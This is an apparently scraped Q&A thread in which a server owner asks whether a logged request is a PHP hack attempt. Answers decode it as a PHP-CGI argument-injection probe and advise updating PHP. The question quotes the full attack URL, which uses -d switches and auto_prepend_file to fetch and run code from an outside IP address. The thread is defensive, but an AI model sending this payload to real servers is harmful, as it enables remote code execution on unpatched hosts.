PHP - does this look like a hack attempt
Question
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
这些很多都在我的apache日志中创建了404,看起来像是PHP hack尝试?
2 answers
solution1
4 ACCPTED 2013-10-15 21:35:59
To me, it does look like a hack attempt.
From PHP Release Announcement page
Some systems support a method for supplying a array of strings to the CGI script. This is only used in the case of an `indexed' query. This is identified by a "GET" or "HEAD" HTTP request with a URL search string not containing any unencoded = characters.
The URL-decoded query string looks like this:
/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt
These are all -d switches, which are used to define php.ini directives. Basically, this is what it changes:
safe_mode=off
disable_functions=null
allow_url_fopen=on
allow_url_include=on
And finally, there is auto_prepend_file=http://61.19.253.26/echo.txt -- this directive includes the PHP code located at http://61.19.253.26/echo.txt and execute it before the code inside index.php.
The echo.txt is hosted on a web server somewhere in Thailand and contains <?php echo "dsfer34w5rlsidfosdedfpsd"; ?> <?php echo "dsfer34w5rlsidfosdedfpsd"; ?> . This is probably used to check if your server is vulnerable to attacks.
And if you use Apache mod_cgi / mod_cgid to run a PHP version before 5.3.13 and 5.4.x before 5.4.3 update now : http://www.php.net/downloads.php
solution2
1 2013-10-15 21:26:30
Yes.
Read the following page, it explained everything:
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.